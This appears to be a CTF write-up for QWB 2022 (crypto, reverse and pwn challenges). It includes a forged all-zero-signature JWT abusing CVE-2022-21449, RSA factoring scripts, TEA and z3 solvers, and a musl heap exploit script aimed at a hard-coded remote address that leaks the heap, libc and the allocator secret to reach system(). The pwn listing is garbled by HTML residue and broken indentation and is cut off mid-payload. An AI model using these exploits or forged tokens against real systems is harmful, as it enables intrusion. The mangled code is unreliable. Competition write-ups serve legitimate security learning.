强网杯2022 Writeup

强网杯writeup by ROIS

misc

签到

签到

问卷

问卷

crypto

myJWT

CVE-2022-21449（Java 的 ECDSA 签名校验接受 r=s=0 的全零签名）：下面 token 的第三段解码后全为零字节，因此能通过签名校验。

eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6dHJ1ZSwiZXhwIjoxNjU5OTk5OTk5OTk5fQ==.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Factor

from Crypto.Util.number import long_to_bytes


def transform(x, y):
    """Return the partial quotients of x/y, computed with Euclid's algorithm.

    Each step records ``x // y`` and continues with ``(y, x % y)`` until the
    remainder is zero.  ``transform(a, 0)`` is the empty list.
    """
    quotients = []
    a, b = x, y
    while b:
        q, rem = divmod(a, b)
        quotients.append(q)
        a, b = b, rem
    return quotients


def continued_fraction(sub_res):
    """Fold a list of partial quotients into one convergent.

    Returns the pair ``(denominator, numerator)`` (note the order) of the
    fraction ``[a0; a1, ..., ak]``.  An empty list yields ``(0, 1)``.
    """
    num, den = 1, 0
    for quotient in reversed(sub_res):
        num, den = quotient * num + den, num
    return den, num


def sub_fraction(x, y):
    """Return the convergents of x/y as ``(denominator, numerator)`` pairs.

    The prefixes of the partial-quotient list are folded one by one; the
    full expansion (whose convergent is x/y itself) is deliberately left
    out, so the result has ``len(transform(x, y)) - 1`` entries.
    """
    quotients = transform(x, y)
    return [continued_fraction(quotients[:k]) for k in range(1, len(quotients))]


def wienerAttack(n1, n2):
    """Scan the convergents of n1/n2 for a numerator that divides n1.

    Despite the name this is not Wiener's small-d attack: the caller relies
    on q1/q2 being a convergent of n1/n2 (which holds when the remaining
    factors of the two moduli are close enough — see the challenge-1 usage
    below).  Returns ``(q1, q2)`` for the first numerator q1 > 1 with
    ``n1 % q1 == 0``, or ``None`` when no convergent qualifies.
    """
    for denominator, numerator in sub_fraction(n1, n2):
        if numerator in (0, 1):
            continue
        if n1 % numerator == 0:
            return numerator, denominator
    return None


# challenge 1
r = 2  # exponent of p in n = p^r * q; the asserts below confirm the factorisation
n11 = 801049932940568005269978912396585741498810389425615966036828877784238116634177290247194019425111606811005728521368879065336038221361037062407029836155148874719789714345603547779284558101833801155509762818376470874215789574939002212274399950433269775325144015468620263028557804618774240232988157961712628677901130814703917513004114547234375629747176834581166306552311075522669403347828095831520693563291249869832390698646691647204371133362254846234990175138047928703289833460734235302093916147489509206061923877623300596194317059884824322527532662470348274079800781120104946546063500763852622187404608639542858285661288293918912184354236687975919510300221932074135531028314170475917110204254042336116619335841213418990605590620842511615815443114612333881430920769002933370887494558640833005339906706603497809846863863967391543647049224309556936909768179259581851520214669904560467640473144481633920438487615788689262961741053146610554997224861331949716721056553499531186695425439163222802917813140266513735841447717418846360096652592844940362932171019143434080184728093326143821165097895058935372215708948088248596585127475770021962501262915274497478428868130455122612016408381607561200802267038869516896665387576895570245272035575637
n12 = 635401970340205725139325006504978344512744926958688031423448003992072769931808217486709574151492230879374574313457662436423263437792389711379687512056391117410807565492548718691166183372633151644917135272259770997096195518489056319350258673723095417922153182423913759272893696867426193704479752772511081457729513843682588951499551132432923147997238597538055902932123792252593514225328196541483451747314048080824405530742533473914329294346486691684904100406972073037050089861816604505650042953778360621934380815999541183067585498606053857125775979915077329566722531830089714823979965934190338538564188253271016367299890015449611141166780048763403252309160517164569110740561584100839212138661881615351382946813818078899882595313362934594951895560189003438775450675343590147821186953526262224973333962454561275321925151619178204499342339749637758100126893330994252902926509705617882239610380420830791088907378397226817514095468815228186716220057075095711894070032344613244803934541318573847029365563159918970404057137270884587905766828750387753130065274147902379993224780149663600462492281891320702134153853359393588902750423972068679293373333869389393970353760507436913233657422185531482023237384247535554666481760197851108297145147371
e11=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865
e12=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881
c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579
c12=336587005671304527566745948355290412636261748969581976214239578621816863343117433524033533838636941679300497270909696775021031004312477997130741361709262822736904340641138652359632950455651920464042448022467664596484055174270895170499076347333381222768518599018520948098943626229061996126260154604038101543546588917619576702866444998578555907070990331574722135141778182631559802154493815687284077524469331290249057291163803290619701104007028836609832847351748020354798788508790258935718399783002069490123663345156902440501507117289747695510266461539019431610123351176227443612317037899257774045751487135646052309277098939919088029284437221840182769808850184827681307611389353392683707516141736067793897378911235819049432542758429901945202632117089595899280390575706266239252841152490534353760118231918190110043319877744119083811214707593122757409240645257409097436061825613686773916466122693168971062418046703969144004779270391320645495586024342668002497155358623795942692477164489475917351003149045087283510728981096449890130735055015075557614253867698702479920619299919816768972581273507837309179450374634916567083251630203067065663910073926990517108921490442919372774170201239734064819301693527366233007925670043499415100789027665

# q1 | n11 and q2 | n12 are read off a convergent of n11/n12; wienerAttack()
# returns None (and this unpacking raises) if no convergent qualifies.
q1, q2 = wienerAttack(n11, n12)
# Sage's sqrt() yields an exact Integer for a perfect square; the two asserts
# that follow are what actually verify p1, p2.
p1, p2 = sqrt(n11 // q1), sqrt(n12 // q2)
assert n11 == (p1**r) * q1
assert n12 == (p2**r) * q2
# Euler's totient of p^r * q.
phi1 = (p1**(r - 1)) * (p1 - 1) * (q1 - 1)
phi2 = (p2**(r - 1)) * (p2 - 1) * (q2 - 1)
d1 = inverse_mod(e11, phi1)
d2 = inverse_mod(e12, phi2)
# m1 and m2 are not printed: challenge 2 reuses them as exponents.
m1 = pow(c11, d1, n11)
m2 = pow(c12, d2, n12)
assert c11 == pow(m1, e11, n11)  # re-encryption sanity check
assert c12 == pow(m2, e12, n12)


# challenge 2
r = 7  # n2 = p^7 * q (verified by the assert further down)
n2 = 209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209
# The two challenge-1 plaintexts become the exponents of this challenge (ZZ: Sage Integer).
e1 = ZZ(m1)
e2 = ZZ(m2)
c2 = 18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653
PR.<x> = PolynomialRing(Zmod(n2))  # Sage preparser syntax: univariate ring over Z/n2Z
f = e1*e2*x-(e2-e1)
f = f.monic()
# Coppersmith small root (bound X = 2^700); the value it produced is hard-coded
# below so the script does not need to repeat the lattice computation.
# k = f.small_roots(X=2^700, beta=0.75, epsilon=0.05)[0]
k = 3549384841973213309621072870106254602253656209014197632823411827739864720839737811030401306800875843661955913236834617545674409639259372934721570288281471569069146201536309734296340629562207991295283896
# The script assumes this gcd is p^(r-1); the assert after the root extraction checks it.
g = gcd(e1*e2*k-(e2-e1), n2)
p = g^(1/(r-1))  # Sage: exact integer (r-1)-th root when g is a perfect power
q = n2 // (p^7)  # 7 == r
assert n2 == (p**r)*q
phi = (p**(r-1))*(p-1)*(q-1)
# e2 is re-bound here: above it was the challenge-1 plaintext, from now on it
# is the public exponent 65537 used to encrypt c2.
e2 = 0x10001
d2 = inverse_mod(e2, phi)
b = pow(c2, d2, n2)  # challenge-2 plaintext, reused by challenge 3
assert c2 == pow(b, e2, n2)


# challenge 3
r = 7  # n3 = p^7 * q (verified by the assert further down)
n3 = 539779851369541956878655738599584730199799866957191805784596190682932284216781781433367450841202917758999300635019369629627621029957135109806205877317954671312041249493462048283611940752235036153024920172209763260723728345918562258401803973624430150143563078517485996070862532682695228590709019451174548520135142052216785774589096706631010293690859363524584240662502290912412366366114571976050857239915691266377257797199583543940504695517331512813468837128344612227973709974625418257243011036826241599265375741977853552204640800449679679351666009764297016524814036295707311913711955324055690490892097177271718850857268982130811714517356073266905474635370690445031512184247179039751734276906533177939993769044135143389748416635981226449566039039202521305851567296884751935162651063209779647359922622084851547605090230221057349511482738300221222563908357379545905837110168948295030747460300104202323692732549831403834387939156877086852393515817984772384147449841124275061609701453997579569931391166586163299940486204581696722731952467570857217406030804590055255431828403195798003509083922294733709507134156466158642941338493323430671502043066148246348074878064089651235355282144209668143249348243220714471988019011613749340243917652821
e3 = 8179300978753084587812861894047395225516049110376948812109811319430275614612773726672345893359691900281432484382670047044697374818043512731533402576374645405477207239801498428774783768163880078495448747421425078521981578408638790336528372019271073712013371141939808017049399434858687299480461753638164719404612128939787055797762174745092074547412183349192156638711750872083313795551439465507724807626674514935170104573715458782366469587138508845980490673890245713729782917089910271980557159592807350504157192913530007199510144004848020221181558472160543018733124225266127379373751910439604459368078652499029070936707349862139053913745186413782066470461478961703013591655136140060879250067379283913798867648758171004535775565306842444545755351202796833177560656564652632975685912935281581268141803696686952259539945588609591385807620108279333498170028167338690235117003515264281843953984997958878272347778561933726792473981855755454522886321669676790813189668084373153897754540290867346751033567500922477317530445967753955221454744946208555394588111484610700789566547507402309549957740815535069057837915204852490930168843605732632328017129154852857227895362549146737618906180651623216848500491438142456250653458053922622240299736136335179639180898730269690699965799644757774472147210271111150769048976871249731156387939260749192370361488285775377622944817570292095201906142567403539151179209316853493906909989301225903409448461436855145
c3 = 113097822337683973761068913398570777162211043704088253732500045618770280334319497174908657828372816818344430304314992760410247741225285170975119344962728883084314382093407445567724674775086423808679124143380073906159023182353116556175251427048715466914368972746661938211846262612414049036821553068430149530397389927209475908905748728402722287875974303298260579839357610962198145974153609818939841880084892796820949226354126424023144300953584658958900737493704530725894948802258740332090822797815745616247879170037794873059391625680745994045522420168248552864215035136318711240256011217929372430302003068882829637056296413462078222453765071094277727760527662423010417144554652783429899139309180017349156600053882338180319473460877576898373222480215735280046214925463242092830060830764299787309912687294672319845054775281463150375545716818434962456139485501224661520991156961587158843064393883274763714930309353593180897123378717852182761518709151878662808890356934477932099818218743384674756674800089177733447066489275506387382342429495897972218764782517198727316942685748481956118012927027254979181519862451112593068440686462293151078537886822555211870303467014484443432209106264020502334805536091587252238173816637270028678636848763
b = ZZ(b)  # challenge-2 plaintext, used as the constant term of the polynomial
PR.<a> = PolynomialRing(Zmod(n3))  # Sage preparser syntax
f = e3*a - b
f = f.monic()
# Coppersmith small root (bound X = 2^700); hard-coded below, as in challenge 2.
# k = f.small_roots(X=2^700, beta=0.75, epsilon=0.05)[0]
k = 16731588253866128571163910758846497670928988943944436618514118121761227689113110943465936457030051710610254169629932203082368465978112219532158626669990117160986135699541953274434781877420432743573801621
# Assumed to be p^(r-1); the assert below checks the recovered factorisation.
g = gcd(e3*k - b, n3)
p = g^(1/(r-1))  # Sage: exact integer (r-1)-th root when g is a perfect power
q = n3 // (p^7)  # 7 == r
assert n3 == (p**r)*q
phi = (p**(r-1))*(p-1)*(q-1)
d3 = inverse_mod(e3, phi)
flag = pow(c3, d3, n3)
print(long_to_bytes(int(flag)))

reverse

easyapk

加密函数在 sub_554，反编译后的核心循环如下：

// Decompiler pseudo-C of the encryption loop in sub_554; the vNNN names are
// the decompiler's.  Two identities unravel the obfuscated arithmetic below:
//   2*(a|b) - (a^b)                         == a + b
//   (c|~m) - (c&~m) + 2*(c|m) + 1           == c + m   (m a single-bit mask)
// so every such expression is a plain addition / increment.
delta = v173;
  while ( 1 )
  {
    // Outer loop: one 8-byte block per iteration, v143 is the byte offset
    // into the buffer at *v180; the block is overwritten in place (see the
    // stores through *v183 at the bottom of the loop).
    v145 = v179;
    *v141 = v143;
    if ( v143 >= *v145 )
      break;
    count = 0;
    v147 = *v180;
    *v183 = *v180 + v143;
    *v182 = v184;
    *v142 = *(_DWORD *)(v147 + v143);      // v0
    *v107 = *(_DWORD *)(v147 + v143 + 4);  // v1
    *v103 = 0;                             // sum
    // delta is derived from time(0), but only bits 28..31 of the timestamp
    // reach v152.  For a top nibble of 0x6 (epoch seconds 0x60000000..
    // 0x6FFFFFFF, i.e. 2021-2029) v152 == 0x95970C13 and the expression
    // below evaluates to (-0x9E3779B9) + 2*0x9E3779B9 == 0x9E3779B9, the
    // standard TEA delta.
    v148 = time(0);
    v149 = v174;
    v150 = v175;
    v151 = v176;
    v152 = (v148 & 0x30000000) - (v148 & 0xC0000000) + 2 * (v148 & 0x40000000) + 0x35970C13;
    v142 = v177;
    *(_DWORD *)delta = (v152 ^ 0xF4170810 | 0x1C88647) + 2 * (v152 ^ 0xBA075AA);
    // Key schedule: v199 = k[0], *v151 = k[1], *v149 = k[2], *v150 = k[3].
    key = *v182;
    v199 = **v182;
    *v151 = key[1];
    *v149 = key[2];
    *v150 = key[3];
    while ( 1 )
    {
      // 32 TEA rounds (count runs 0..0x1F).
      *v122 = count;
      if ( count > 0x1F )
        break;
      v154 = *v107;
      v155 = 2 * (*v103 | *(_DWORD *)delta) - (*(_DWORD *)delta ^ *v103);  // sum += delta
      *v103 = v155;
      // v0 += ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1)
      v156 = (2 * (v155 | v154) - (v155 ^ v154)) ^ (2 * (v199 | (16 * v154)) - (v199 ^ (16 * v154))) ^ (2 * (*v151 | (v154 >> 5)) - (*v151 ^ (v154 >> 5)));
      v157 = *v149;
      v158 = 2 * (v156 | *v142) - (v156 ^ *v142);
      *v142 = v158;
      // v1 += ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3)
      v159 = (2 * (*v150 | (v158 >> 5)) - (*v150 ^ (v158 >> 5))) ^ (2 * (v157 | (16 * v158)) - (v157 ^ (16 * v158))) ^ (2 * (v158 | *v103) - (*v103 ^ v158));
      *v107 = 2 * (v159 | *v107) - (v159 ^ *v107);
      count = (*v122 | 0xFFFFFFFE) - (*v122 & 0xFFFFFFFE) + 2 * (*v122 | 1) + 1;  // count += 1
    }
    v141 = v178;
    v160 = (_DWORD *)*v183;
    *v160 = *v142;      // write v0 back
    v160[1] = *v107;    // write v1 back
    v143 = (*v141 | 0xFFFFFFF7) - (*v141 & 0xFFFFFFF7) + 2 * (*v141 | 8) + 1;  // offset += 8
  }

鉴定为标准的 TEA 加密（delta 虽由 time() 的高位混淆得出，实际仍是 0x9e3779b9），密钥是 "0123456789abcdef"（即下面代码里的 k[4]）。

最后要比对的加密数据在0x3E78, 抠下来解密,最后还要打个表转换一下:

解密:

```cpp=
#include <stdio.h>
#include <stdint.h>

/* Ciphertext copied out of the APK (the writeup points at offset 0x3E78): four
 * 64-bit TEA blocks, i.e. eight little-endian uint32 words, decrypted in place by main(). */
uint32_t enc_data[] = {0x5D94AA84, 0x14FA24A0, 0x2B560210, 0xB69BDD49, 0xAAEFEAD4,0x4B8CF4C6, 0x97FB8C9, 0xB5EC51D2};

/* ROT13 alphabets.  Not referenced by this C program; the table lookup is done
 * in the Python snippet that follows. */
char table1[] = "abcdefghijklmnopqrstuvwxyz";
char table2[] = "nopqrstuvwxyzabcdefghijklm";

/* TEA block encryption: 32 rounds over the 64-bit block v[0..1] with the
 * 128-bit key k[0..3]; sum is advanced by delta before every round.
 * v is updated in place, k is read only. */
void encrypt(uint32_t *v, uint32_t *k)
{
    const uint32_t delta = 0x9e3779b9;
    uint32_t a = v[0], b = v[1], sum = 0;
    uint32_t i;

    for (i = 0; i < 32; i++) {
        sum += delta;
        a += ((b << 4) + k[0]) ^ (b + sum) ^ ((b >> 5) + k[1]);
        b += ((a << 4) + k[2]) ^ (a + sum) ^ ((a >> 5) + k[3]);
    }
    v[0] = a;
    v[1] = b;
}
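/* TEA block decryption, the exact inverse of encrypt(): start from
 * sum = 32 * delta (0xC6EF3720 mod 2^32) and undo the rounds in reverse.
 * v is updated in place, k is read only.
 * (The pasted original carried a stray "<br />" at the end of the first
 * declaration line, which is not C; it is removed here.) */
void decrypt(uint32_t *v, uint32_t *k)
{
    const uint32_t delta = 0x9e3779b9;
    uint32_t a = v[0], b = v[1], sum = 0xC6EF3720;
    uint32_t i;

    for (i = 0; i < 32; i++) {
        b -= ((a << 4) + k[2]) ^ (a + sum) ^ ((a >> 5) + k[3]);
        a -= ((b << 4) + k[0]) ^ (b + sum) ^ ((b >> 5) + k[1]);
        sum -= delta;
    }
    v[0] = a;
    v[1] = b;
}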

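/* Decrypt enc_data in place with the key "0123456789abcdef" and print the
 * plaintext bytes, least-significant byte of each word first.  The result is
 * still ROT13-encoded (see the table conversion that follows).
 * The pasted original had HTML residue ("<pre><code>return 0;</code></pre>")
 * where the return statement belongs; restored here. */
int main(void)
{
    /* "0123" "4567" "89ab" "cdef" as little-endian uint32 words. */
    uint32_t k[4] = {0x33323130, 0x37363534, 0x62613938, 0x66656463};
    int i, j;

    for (i = 0; i < 8; i += 2) {
        decrypt(&enc_data[i], k);
        /* Bytes of word i, then of word i + 1, low byte first. */
        for (j = 0; j < 8; j++) {
            putchar((enc_data[i + j / 4] >> (8 * (j % 4))) & 0xff);
        }
    }
    puts("");

    return 0;
}
// synt{Vg_Vf_A0g_guNg_zHpu_unEqre}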
// synt{Vg_Vf_A0g_guNg_zHpu_unEqre}

```

打表转换:
```python=
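# ROT13 the TEA plaintext back into the flag.  table2 is table1 rotated by 13,
# so a character's index in table2 selects the original letter in table1;
# anything outside both alphabets (digits, '{', '_', '}') passes through.
# The pasted original used curly quotes and an empty string rendered as a
# single ”, which is not valid Python; the literals are restored here.
table1 = "abcdefghijklmnopqrstuvwxyz"
table2 = "nopqrstuvwxyzabcdefghijklm"
table1_uppper = table1.upper()
table2_uppper = table2.upper()
flag = 'synt{Vg_Vf_A0g_guNg_zHpu_unEqre}'

# One translation table replaces the per-character find() loop; unmapped
# characters are left unchanged by str.translate, matching the old else branch.
_rot13 = str.maketrans(table2 + table2_uppper, table1 + table1_uppper)
res = flag.translate(_rot13)

print(res)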

GameMaster

使用 dnSpy 调试，在 console.exe 的 goldFunc 中找到获取输入作弊码的相关代码，通过 patch flag 改变运行流程，执行到 binaryFormatter.Deserialize(serializationStream); 获取反序列化出的 dll。

最后是关键验证函数:

```c=
/// <summary>
/// Generates 40 keystream bytes from three seeds.  Each of x, y, z is a
/// shift register clocked once per step (feedback = XOR of a few tap bits,
/// shifted in at bit 0); per step one output bit is chosen from x or y
/// depending on a bit of z, and eight consecutive bits are packed MSB-first
/// into the next byte of <paramref name="KeyStream"/>.
/// </summary>
/// <param name="x">Seed of the first register (taps 29, 28, 25, 23).</param>
/// <param name="y">Seed of the second register (taps 30, 27).</param>
/// <param name="z">Seed of the selector register (taps 31, 30, 29, 28, 26, 24).</param>
/// <param name="KeyStream">Output buffer; bytes 0..39 are overwritten.</param>
private static void Check1(ulong x, ulong y, ulong z, byte[] KeyStream)
{
    int num = -1;
    for (int i = 0; i < 320; i++)
    {
        ulong fx = (x >> 29) ^ (x >> 28) ^ (x >> 25) ^ (x >> 23);
        ulong fy = (y >> 30) ^ (y >> 27);
        ulong fz = (z >> 31) ^ (z >> 30) ^ (z >> 29) ^ (z >> 28) ^ (z >> 26) ^ (z >> 24);
        x = (x << 1) | (fx & 1UL);
        y = (y << 1) | (fy & 1UL);
        z = (z << 1) | (fz & 1UL);

        // A new output byte starts every eight steps (first at i == 0).
        if (i % 8 == 0)
        {
            num++;
        }

        // bit = sel ? xb : yb, written as (sel & xb) ^ (~sel & yb).
        ulong sel = (z >> 32) & 1UL;
        ulong xb = (x >> 30) & 1UL;
        ulong yb = (y >> 31) & 1UL;
        ulong bit = (sel & xb) ^ ((sel ^ 1UL) & yb);
        KeyStream[num] = (byte)(((uint)KeyStream[num] << 1) | (uint)bit);
    }
}

```

使用 z3 来解决，python 脚本：

```python=
from numpy import array
from z3 import *

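def get_b(data, n):
    """Return bit *n* of *data*, counting from the most significant of 8 bits.

    ``data`` is zero-padded on the left to at least eight binary digits
    (wider values are left as they are), so ``n == 0`` is the MSB and
    ``n == 7`` the LSB of a byte.  The padded bit list is printed as a
    debugging aid, as in the original script.

    The pasted original used curly quotes around ``'0'``, which is not
    valid Python; the literal is restored here.
    """
    bits = list(bin(data)[2:])
    bin_str = ['0'] * (8 - len(bits)) + bits
    print(bin_str)
    return int(bin_str[n])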

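# Recover x, y, z
def get_xyz():
    """Solve for the three register seeds that reproduce the captured keystream.

    Mirrors Check1() from the .NET binary: three shift registers are clocked
    320 times and one selected bit per step is packed MSB-first into bytes;
    each produced bit is constrained to equal the corresponding bit of
    ``first`` (the 40 captured keystream bytes).  Prints the solver verdict
    and the model, and returns the model.

    Raises z3's exception from ``s.model()`` when the constraints are unsat.
    The pasted original used curly quotes in the BitVec names, which is not
    valid Python; they are restored here.
    """
    s = Solver()
    x = BitVec('x', 64)
    y = BitVec('y', 64)
    z = BitVec('z', 64)

    first = [101, 5, 80, 213, 163, 26, 59, 38, 19, 6, 173, 189, 198, 166, 140, 183, 42, 247, 223, 24,
             106, 20, 145, 37, 24, 7, 22, 191, 110, 179, 227, 5, 62, 9, 13, 17, 65, 22, 37, 5]

    # NOTE: z3's ``>>`` on a BitVec is an arithmetic shift; only bit 0 of each
    # shifted value is used below, so it matches the C# logical shift here.
    num = -1
    for j in range(320):
        x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1) | x << 1)
        y = (((y >> 30 ^ y >> 27) & 1) | y << 1)
        z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1) | z << 1)
        if j % 8 == 0:
            num += 1
            print(num)
        # Bit j % 8 (MSB first) of keystream byte num must equal the generated bit.
        tmp = get_b(first[num], j % 8)
        s.add(tmp == ((z >> 32 & 1 & (x >> 30 & 1)) ^ (((z >> 32 & 1) ^ 1) & (y >> 31 & 1))))

    print(s.check())
    m = s.model()
    print(str(m))
    return m
# [y = 868387187, x = 156324965, z = 3131229747]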
def get_key(array):
    """Split the first three 32-bit words of *array* into 12 little-endian bytes.

    Word i contributes bytes ``(array[i] >> 0) & 0xff`` .. ``(array[i] >> 24) & 0xff``
    in that order; entries beyond index 2 are ignored.
    """
    return [(array[i] >> (8 * j)) & 0xff for i in range(3) for j in range(4)]

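# x, y, z from the z3 model above, in that order.
array0 = [156324965, 868387187, 3131229747]
key = get_key(array0)
array5 = [60, 100, 36, 86, 51, 251, 167, 108, 116, 245, 207, 223, 40, 103, 34, 62, 22, 251, 227]
flag = ""
# XOR the captured bytes with the 12-byte key, repeating the key as needed.
# array5 is updated in place, as in the original script.
# (The pasted original used curly quotes around the string literals, which
# is not valid Python; restored here.)
for i in range(len(array5)):
    array5[i] = array5[i] ^ key[i % len(key)]
    flag += chr(array5[i])
print(array5)
print(flag)
print("flag{" + flag + "}")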

pwn

usermanager

musl 1.2.2 题目。insert 替换时没有更新指向全局变量的指针，导致 UAF，可泄露堆地址；而且 tail 被删除后仍作为链表的 tail，导致被重复使用。之后是 musl 的常规思路：伪造 meta、group、area，修改 io，在 exit 时执行 system。

```python=
from pwn import *
libc = ELF("./libc.so")  # the challenge's musl build (1.2.2 per the text above); only used for a symbol print below
#r=process(['./libc.so',"./UserManager"])  # local run through the musl loader, disabled in favour of the remote instance
r=remote('59.110.212.61',23467)
elf = ELF("./UserManager")
#context.log_level = 'debug'
def ch(i):
    """Send menu choice *i* (as a decimal string) once the ": " prompt arrives."""
    choice = str(i)
    r.sendlineafter(": ", choice)

def add(id, size, name):
    """Menu choice 1: answer the Id / length / UserName prompts with *id*, *size*, *name*."""
    ch(1)
    for prompt, value in (("Id:", str(id)), ("length:", str(size))):
        r.sendlineafter(prompt, value)
    r.sendlineafter("UserName:", name)

def check(id):
    """Menu choice 2 for user *id*; the caller reads whatever the service prints afterwards."""
    r.sendlineafter(": ", str(2))
    r.sendlineafter("Id:", str(id))

def free(id):
    """Menu choice 3 (delete) for user *id*."""
    ch(3)
    target = str(id)
    r.sendlineafter("Id:", target)

def clear():
    """Menu choice 4 (clear); takes no further input."""
    r.sendlineafter(": ", str(4))

# NOTE(review): this listing is a mangled paste.  "0×38" stands for 0x38, the
# "<em>"/"</em>" pairs are what markdown made of the "*" in b'..'*8, and the
# trailing "<br />" is a stray line break; as printed it is not valid Python.
# All libc offsets below are hard-coded for the challenge's libc.so build
# (the text further down notes that the local environment did not match the
# remote one).
add(0,0×38,b'0'*8)

add(1,0×38,b'1'<em>8)
add(2,0×38,b'2'</em>8)

add(2,0×38,b'T'<em>8)
add(3,0×10,b'x'</em>8)
# Leak: after the replacement, showing entry 2 prints a heap pointer right
# after the 0xdeadbeef marker.
check(2)
r.recvuntil(p64(0xdeadbeef))
heap_address = u64(r.recv(8))

print("heap_address: " ,hex(heap_address))
libc_base = heap_address-0x0b7d60
print("libc_base : ",hex(libc_base))
# The symbol lookup is commented out in favour of a fixed offset; the next
# print shows the local symbol value for comparison.
#system = libc_base+libc.sym['system']
system = libc_base+0x50a90
print(hex(libc.sym['system']))
stdout = libc_base+0x0b3da0
__malloc_context = 0x0b4ac0+libc_base
ofl_head = libc_base+ 0x0b6e40+8
print("__malloc_context: ",hex(__malloc_context))
print("stdout : ",hex(stdout))
print("system : ",hex(system))
print("ofl_head: ",hex(ofl_head))

# Entry 4 carries a crafted record pointing at __malloc_context; showing entry
# 2 afterwards dumps the allocator context (secret, free/avail meta, active[]).
add(4,0×38,p64(2)+p64(__malloc_context)+p64(0x500)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))
#
check(2)
r.recv(1)
secret = u64(r.recv(8))
r.recv(0x10)
free_meta = u64(r.recv(8))
avail_meta=u64(r.recv(8))
for i in range(5):
r.recv(8)
active=list()
for i in range(64):
active.append(u64(r.recv(8)))
meta_base = active[3]

print("secret : ",secret)
print("p <em>(struct meta</em>) ",hex(meta_base))

#add(7,0×10,b'\xff'<em>8)
#add(8,0×10,b'\xff'</em>8)
# Same trick again, now reading from the meta area found above.
free(4)
add(4,0×38,p64(2)+p64(meta_base)+p64(0x500)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))
print("+++++++++++++++++++++++++++++++++++++++")
check(2)
r.recv()
for i in range(2):
print(hex(u64(r.recv(8))))
aaaaa= u64(r.recv(8))
print("a real slot address",hex(aaaaa))
free(4)

fake_chunk_address = libc_base+0x1050-0x6fe0
fakemeta_addr = fake_chunk_address-0x50

print("fake_meta_addr : ",hex(fakemeta_addr))
#fake_stdout_addr = aaaaa+0x430+0x50
fake_stdout_addr = libc_base+0xb7ac0
print("fake_stdout_addr:",hex(fake_stdout_addr))

print("fake_chunk_address ",hex(fake_chunk_address))

#add(4,0×38,p64(2)+p64(libc_base+0xb7870)+p64(0x140)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))
add(4,0×38,p64(2)+p64(libc_base+0x1050-0x6fe0)+p64(0x100)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))

add(5,0×50,b'x'<em>0x8)
add(6,0×10,b'\xff'</em>8)
#context.log_level='debug'

# One large (0x2030-byte) name holds the forged structures: two meta records
# (with the leaked secret) and an area header, padded to the expected layout.
fake_meta =b'\x00'<em>(4064)+p64(secret)+p64(0)</em>3<br />
